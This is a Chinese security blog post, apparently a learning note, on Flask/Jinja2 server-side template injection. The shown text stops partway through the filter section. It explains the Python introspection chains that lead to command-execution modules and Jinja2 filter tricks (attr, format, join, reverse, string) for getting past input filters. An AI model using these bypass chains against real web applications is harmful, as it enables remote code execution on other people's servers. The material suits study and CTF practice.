<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 5.4.2">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-trophy-1.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-trophy-1.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.css" integrity="sha256-Z1K5uhUaJXA7Ll0XrZ/0JhX4lAtZFpT6jkKrEDT0drU=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"www.z1d10t.fun","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.14.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"show_result":true,"style":"mac"},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.json","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="Flask SSTI">
<meta property="og:type" content="article">
<meta property="og:title" content="Flask SSTI简单学习">
<meta property="og:url" content="https://www.z1d10t.fun/post/c52c3ed.html">
<meta property="og:site_name" content="Z1d10tのBlog">
<meta property="og:description" content="Flask SSTI">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1692343076146-0d66b0c5-04a0-4eb6-8136-666e07389d06.png">
<meta property="og:image" content="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1692349329941-cb5af00f-68ae-4fa1-90cb-496a1cedb40d.png">
<meta property="og:image" content="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1692349601730-0a12bdff-7cdb-44f9-a0b4-5db308ab3cc9.png">
<meta property="og:image" content="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1692349815755-69fb51d9-5140-4b90-9be5-72c61c2cd7e0.png">
<meta property="og:image" content="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1692353373357-ff1aea78-b318-4a51-b0ae-8ed11fcc5d7b.png">
<meta property="article:published_time" content="2023-08-18T10:37:27.000Z">
<meta property="article:modified_time" content="2023-08-18T10:42:41.833Z">
<meta property="article:author" content="Z1d10t">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1692343076146-0d66b0c5-04a0-4eb6-8136-666e07389d06.png">


<link rel="canonical" href="https://www.z1d10t.fun/post/c52c3ed.html">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://www.z1d10t.fun/post/c52c3ed.html","path":"post/c52c3ed.html","title":"Flask SSTI简单学习"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Flask SSTI简单学习 | Z1d10tのBlog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Z1d10tのBlog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description"> </p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-house fa-fw"></i>首页</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tag fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-rectangle-list fa-fw"></i>分类</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>博主</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#SSTI%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="nav-number">1.</span> <span class="nav-text">SSTI前置知识</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#class"><span class="nav-number">1.1.</span> <span class="nav-text">class</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#base-%E5%92%8C-bases"><span class="nav-number">1.2.</span> <span class="nav-text">base__和__bases</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mro"><span class="nav-number">1.3.</span> <span class="nav-text">mro</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#subclasses"><span class="nav-number">1.4.</span> <span class="nav-text">subclasses()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#init"><span class="nav-number">1.5.</span> <span class="nav-text">init</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#globals"><span class="nav-number">1.6.</span> <span class="nav-text">globals</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#builtins"><span class="nav-number">1.7.</span> <span class="nav-text">builtins</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#python2-%E4%B8%AD%E4%B8%BA-bulitins-%E5%92%8C-bulitin"><span class="nav-number">1.7.1.</span> <span class="nav-text">python2 中为__bulitins__和__bulitin__</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#python3%E4%B8%AD%E4%B8%BA-builtins-%E5%92%8Cbuiltins"><span class="nav-number">1.7.2.</span> <span class="nav-text">python3中为__builtins__和builtins</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#import"><span class="nav-number">1.8.</span> <span class="nav-text">import()</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="nav-number">2.</span> <span class="nav-text">过滤器</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#attr"><span class="nav-number">2.1.</span> <span class="nav-text">attr()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#format"><span class="nav-number">2.2.</span> <span class="nav-text">format()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#first-last-random"><span class="nav-number">2.3.</span> <span class="nav-text">first() last() random()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#join"><span class="nav-number">2.4.</span> <span class="nav-text">join()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#lower"><span class="nav-number">2.5.</span> <span class="nav-text">lower()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#replace-reverse"><span class="nav-number">2.6.</span> <span class="nav-text">replace() reverse()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#string"><span class="nav-number">2.7.</span> <span class="nav-text">string</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#select"><span class="nav-number">2.8.</span> <span class="nav-text">select</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#list"><span class="nav-number">2.9.</span> <span class="nav-text">list</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%98%E9%87%8F"><span class="nav-number">3.</span> <span class="nav-text">变量</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%8B%BC%E6%8E%A5%EF%BC%9A"><span class="nav-number">3.1.</span> <span class="nav-text">拼接：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8D%E8%BD%AC"><span class="nav-number">3.2.</span> <span class="nav-text">反转</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ascii%E8%BD%AC%E6%8D%A2"><span class="nav-number">3.3.</span> <span class="nav-text">ascii转换</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="nav-number">3.4.</span> <span class="nav-text">编码绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9C%A8jinja2%E9%87%8C%E9%9D%A2%E5%8F%AF%E4%BB%A5%E5%88%A9%E7%94%A8-%E8%BF%9B%E8%A1%8C%E6%8B%BC%E6%8E%A5"><span class="nav-number">3.5.</span> <span class="nav-text">在jinja2里面可以利用~进行拼接</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SSTI%E8%AF%AD%E5%8F%A5%E6%9E%84%E9%80%A0"><span class="nav-number">4.</span> <span class="nav-text">SSTI语句构造</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A6%96%E5%85%88%E5%B0%B1%E6%98%AF%E8%A6%81%E6%8B%BF%E5%88%B0%E5%BD%93%E5%89%8D%E7%B1%BB"><span class="nav-number">4.1.</span> <span class="nav-text">首先就是要拿到当前类</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%8B%BFobject"><span class="nav-number">4.2.</span> <span class="nav-text">拿object</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%8B%BF%E5%9F%BA%E7%B1%BB%E7%9A%84%E5%AD%90%E7%B1%BB"><span class="nav-number">4.3.</span> <span class="nav-text">拿基类的子类</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#init-%E6%96%B9%E6%B3%95%E8%BF%9B%E8%A1%8C%E5%88%9D%E5%A7%8B%E5%8C%96%E7%B1%BB"><span class="nav-number">4.4.</span> <span class="nav-text">__init__方法进行初始化类</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%84%B6%E5%90%8E%E5%86%8D%E8%B0%83%E7%94%A8-globals-%E8%8E%B7%E5%8F%96%E5%88%B0%E6%96%B9%E6%B3%95%E5%86%85%E4%BB%A5%E5%AD%97%E5%85%B8%E7%9A%84%E5%BD%A2%E5%BC%8F%E8%BF%94%E5%9B%9E%E7%9A%84%E6%96%B9%E6%B3%95%E3%80%81%E5%B1%9E%E6%80%A7"><span class="nav-number">4.5.</span> <span class="nav-text">然后再调用__globals__获取到方法内以字典的形式返回的方法、属性</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SSTI%E5%B8%B8%E8%A7%81%E7%9A%84%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F"><span class="nav-number">5.</span> <span class="nav-text">SSTI常见的绕过方式</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87"><span class="nav-number">5.1.</span> <span class="nav-text">绕过.</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87-1"><span class="nav-number">5.2.</span> <span class="nav-text">绕过_</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87-2"><span class="nav-number">5.3.</span> <span class="nav-text">绕过[]</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E8%8A%B1%E6%8B%AC%E5%8F%B7"><span class="nav-number">5.4.</span> <span class="nav-text">绕过花括号</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E5%8D%95%E5%BC%95%E5%8F%B7%E5%92%8C%E5%8F%8C%E5%BC%95%E5%8F%B7"><span class="nav-number">5.5.</span> <span class="nav-text">绕过单引号和双引号</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%95%B0%E5%AD%97"><span class="nav-number">5.6.</span> <span class="nav-text">绕过数字</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E5%85%B3%E9%94%AE%E5%AD%97"><span class="nav-number">5.7.</span> <span class="nav-text">绕过关键字</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8payload"><span class="nav-number">6.</span> <span class="nav-text">常用payload</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%90%8E%E8%A8%80%EF%BC%9A"><span class="nav-number">7.</span> <span class="nav-text">后言：</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Z1d10t"
      src="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1695400865185.png">
  <p class="site-author-name" itemprop="name">Z1d10t</p>
  <div class="site-description" itemprop="description">邪王真眼是最强的！</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">80</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">82</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://www.z1d10t.fun/post/c52c3ed.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1695400865185.png">
      <meta itemprop="name" content="Z1d10t">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Z1d10tのBlog">
      <meta itemprop="description" content="邪王真眼是最强的！">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Flask SSTI简单学习 | Z1d10tのBlog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Flask SSTI简单学习
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2023-08-18 18:37:27 / 修改时间：18:42:41" itemprop="dateCreated datePublished" datetime="2023-08-18T18:37:27+08:00">2023-08-18</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E7%9F%A5%E8%AF%86%E5%AD%A6%E4%B9%A0/" itemprop="url" rel="index"><span itemprop="name">知识学习</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>Flask SSTI</p>
<span id="more"></span>

<h1 id="SSTI前置知识"><a href="#SSTI前置知识" class="headerlink" title="SSTI前置知识"></a>SSTI前置知识</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#123;%%&#125;可以用来声明变量，当然也可以用于循环语句和条件语句。</span><br><span class="line">&#123;&#123;&#125;&#125;用于将表达式打印到模板输出</span><br><span class="line">&#123;<span class="comment">##&#125;表示未包含在模板输出中的注释</span></span><br><span class="line"><span class="comment">##可以有和&#123;%%&#125;相同的效果</span></span><br></pre></td></tr></table></figure>

<p>了解一些python的魔术方法和内置类</p>
<h2 id="class"><a href="#class" class="headerlink" title="class"></a><strong>class</strong></h2><p>返回该对象所属的类 </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt;<span class="string">&#x27;&#x27;</span>.__class__ <span class="comment">#&#x27;&#x27;里面是字符串类型</span></span><br><span class="line">&lt;<span class="keyword">class</span> <span class="string">&#x27;str&#x27;</span>&gt;</span><br><span class="line">&gt;&gt;&gt;().__class__</span><br><span class="line">&lt;<span class="keyword">class</span> <span class="string">&#x27;tuple&#x27;</span>&gt; <span class="comment">#()里面是元组类型</span></span><br></pre></td></tr></table></figure>

<h2 id="base-和-bases"><a href="#base-和-bases" class="headerlink" title="base__和__bases"></a><strong>base__和__bases</strong></h2><p>都是用于获取类的基类 基类也叫父类</p>
<p>但是base是以字符串形式 而bases以元组的形式返回一个类所直接集成的类</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="string">&quot;&quot;</span>.__class__</span><br><span class="line">&lt;<span class="keyword">class</span> <span class="string">&#x27;str&#x27;</span>&gt;</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="string">&quot;&quot;</span>.__class__.__base__</span><br><span class="line">&lt;<span class="keyword">class</span> <span class="string">&#x27;object&#x27;</span>&gt;</span><br><span class="line">//<span class="built_in">object</span>为<span class="built_in">str</span>的基类</span><br><span class="line">&gt;&gt;&gt;<span class="string">&quot;&quot;</span>.__class__.__bases__</span><br><span class="line">(&lt;<span class="keyword">class</span> <span class="string">&#x27;object&#x27;</span>&gt;,)</span><br></pre></td></tr></table></figure>

<h2 id="mro"><a href="#mro" class="headerlink" title="mro"></a><strong>mro</strong></h2><p>返回解析方法调用的顺序</p>
<p>（当调用_mro_[1]或者-1时作用其实等同于_base_）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="string">&quot;&quot;</span>.__class__.__mro__</span><br><span class="line">(&lt;<span class="keyword">class</span> <span class="string">&#x27;str&#x27;</span>&gt;, &lt;<span class="keyword">class</span> <span class="string">&#x27;object&#x27;</span>&gt;)</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="string">&quot;&quot;</span>.__class__.__mro__[<span class="number">1</span>]</span><br><span class="line">&lt;<span class="keyword">class</span> <span class="string">&#x27;object&#x27;</span>&gt;</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="string">&quot;&quot;</span>.__class__.__mro__[-<span class="number">1</span>]</span><br><span class="line">&lt;<span class="keyword">class</span> <span class="string">&#x27;object&#x27;</span>&gt;</span><br></pre></td></tr></table></figure>

<h2 id="subclasses"><a href="#subclasses" class="headerlink" title="subclasses()"></a><strong>subclasses</strong>()</h2><p>获取类的所有子类</p>
<p>这里需要知道object是所有类的基类</p>
<p>所以object下子类是所有类</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt;<span class="string">&quot;&quot;</span>.__class__.__base__.__subclasses__()</span><br><span class="line">可以获取到很多我们可以利用的类 然后通过[]索引下标来获取我们想要的类</span><br></pre></td></tr></table></figure>

<h2 id="init"><a href="#init" class="headerlink" title="init"></a><strong>init</strong></h2><p>所有可被当作模板导入的都包含__init__方法，通过此方法来调用__globals__方法</p>
<h2 id="globals"><a href="#globals" class="headerlink" title="globals"></a><strong>globals</strong></h2><p>该方法会以字典的形式返回当前位置的所有全局变量</p>
<p>所有函数都会有一个 <strong>globals</strong> 属性， 用于获取当前空间下可使用的模块、方法及其所有变量，结果是一个字典</p>
<h2 id="builtins"><a href="#builtins" class="headerlink" title="builtins"></a><strong>builtins</strong></h2><h3 id="python2-中为-bulitins-和-bulitin"><a href="#python2-中为-bulitins-和-bulitin" class="headerlink" title="python2 中为__bulitins__和__bulitin__"></a>python2 中为__bulitins__和__bulitin__</h3><p><strong>builtins</strong> 实际上是一个指向或者说引用 <strong>builtin</strong> 的（有点类似于软链接）</p>
<p>这里 <strong>builtins</strong> 是内建名称空间，是这个模块本身定义的一个名称空间，在这个内建名称空间中存在一些我们经常用到的内置函数（即不需要导入包即可调用的函数）如：print()、str()还包括一些异常和其他属性。</p>
<h3 id="python3中为-builtins-和builtins"><a href="#python3中为-builtins-和builtins" class="headerlink" title="python3中为__builtins__和builtins"></a>python3中为__builtins__和builtins</h3><p> builtins 代替的 <strong>builtin</strong></p>
<p>在python中有一些BIF（内置函数）是可以直接调用的，比如str(), print()等，这些函数可以通过 dir(<strong>builtins</strong>) 可以查到。</p>
<p><img src="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1692343076146-0d66b0c5-04a0-4eb6-8136-666e07389d06.png" alt="img"></p>
<h2 id="import"><a href="#import" class="headerlink" title="import()"></a><strong>import</strong>()</h2><p>该方法用于动态加载类和函数 如果一个模块经常变化就可以使用__import__()来动态载入 语法<code>__import__(模块名)</code></p>
<p>总体思路就是：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">找到父类&lt;<span class="built_in">type</span> <span class="string">&#x27;object&#x27;</span>&gt; ---&gt; 寻找子类 ---&gt; 找关于命令执行或者文件操作的模块。</span><br></pre></td></tr></table></figure>

<h1 id="过滤器"><a href="#过滤器" class="headerlink" title="过滤器"></a>过滤器</h1><p>变量可以通过过滤器修改。过滤器与变量之间用管道符号（|）隔开，括号中可以有可选参数</p>
<p>可以链接多 个过滤器</p>
<p>一个过滤器的输出应用于下一个过滤器。</p>
<h2 id="attr"><a href="#attr" class="headerlink" title="attr()"></a>attr()</h2><p>用于获取对象的属性</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;&quot;</span>|attr(<span class="string">&quot;__class__&quot;</span>)</span><br><span class="line">相当于</span><br><span class="line"><span class="string">&quot;&quot;</span>.__class__</span><br></pre></td></tr></table></figure>

<p>常见于点号<code>.</code>被过滤，或者点号<code>.</code>和中括号<code>[]</code>都被过滤的情况</p>
<h2 id="format"><a href="#format" class="headerlink" title="format()"></a>format()</h2><p>简单理解就是格式化字符</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;%c%c%c%c%c%c%c%c%c&quot;</span>|<span class="built_in">format</span>(<span class="number">95</span>,<span class="number">95</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">115</span>,<span class="number">95</span>,<span class="number">95</span>)  <span class="comment">#相当于__class__</span></span><br></pre></td></tr></table></figure>

<h2 id="first-last-random"><a href="#first-last-random" class="headerlink" title="first() last() random()"></a>first() last() random()</h2><p>返回第一个值 最后一个值或者随机 </p>
<p>随机的话需要我们跑个脚本就有几率获取到我们想要的内容了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt;<span class="string">&quot;&quot;</span>.__class__.__base__.__subclasses__()|first()</span><br><span class="line">&lt;<span class="keyword">class</span> <span class="string">&#x27;type&#x27;</span>&gt;</span><br><span class="line">&gt;&gt;&gt;<span class="string">&quot;&quot;</span>.__class__.__base__.__subclasses__()|last()</span><br><span class="line">&lt;<span class="keyword">class</span> <span class="string">&#x27;jinja2.ext._CommentFinder&#x27;</span>&gt;</span><br><span class="line">&gt;&gt;&gt;<span class="string">&quot;&quot;</span>.__class__.__base__.__subclasses__()|random()</span><br><span class="line">&lt;<span class="keyword">class</span> <span class="string">&#x27;wrapper_descriptor&#x27;</span>&gt;</span><br></pre></td></tr></table></figure>

<h2 id="join"><a href="#join" class="headerlink" title="join()"></a>join()</h2><p>字符串拼接</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;&quot;</span>[[<span class="string">&#x27;__clas&#x27;</span>,<span class="string">&#x27;s__&#x27;</span>]|join] 或者 <span class="string">&quot;&quot;</span>[(<span class="string">&#x27;__clas&#x27;</span>,<span class="string">&#x27;s__&#x27;</span>)|join]</span><br><span class="line">相当于</span><br><span class="line"><span class="string">&quot;&quot;</span>[<span class="string">&quot;__class__&quot;</span>]</span><br></pre></td></tr></table></figure>

<h2 id="lower"><a href="#lower" class="headerlink" title="lower()"></a>lower()</h2><p>转化为小写</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt;<span class="string">&quot;&quot;</span>[<span class="string">&quot;__CLASS__&quot;</span>|lower()]</span><br><span class="line">&lt;<span class="keyword">class</span> <span class="string">&#x27;str&#x27;</span>&gt;</span><br></pre></td></tr></table></figure>



<h2 id="replace-reverse"><a href="#replace-reverse" class="headerlink" title="replace() reverse()"></a>replace() reverse()</h2><p>替换和反转还原回我们要用的字符串</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;__claee__&quot;</span>|replace(<span class="string">&quot;ee&quot;</span>,<span class="string">&quot;ss&quot;</span>) 构造出字符串 <span class="string">&quot;__class__&quot;</span></span><br><span class="line"><span class="string">&quot;__ssalc__&quot;</span>|reverse 构造出 <span class="string">&quot;__class__&quot;</span></span><br></pre></td></tr></table></figure>

<h2 id="string"><a href="#string" class="headerlink" title="string"></a>string</h2><p>功能类似于python内置函数 str<br>有了这个的话我们可以把显示到浏览器中的值全部转换为字符串再通过下标引用，就可以构造出一些字符了，再通过拼接就能构成特定的字符串。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt;().__class__ </span><br><span class="line">&lt;<span class="keyword">class</span> <span class="string">&#x27;tuple&#x27;</span>&gt;</span><br><span class="line">&gt;&gt;&gt;(().__class__|string)[<span class="number">1</span>] <span class="comment">#注意这里要先()括起来然后再用下标调用</span></span><br><span class="line">c</span><br></pre></td></tr></table></figure>

<h2 id="select"><a href="#select" class="headerlink" title="select"></a>select</h2><p>和之前的结合起来有大作用</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt;()|select|string</span><br><span class="line">&lt;generator <span class="built_in">object</span> select_or_reject at <span class="number">0x7fc7678cdf90</span>&gt;</span><br></pre></td></tr></table></figure>

<p>然后我们就可以切字符了</p>
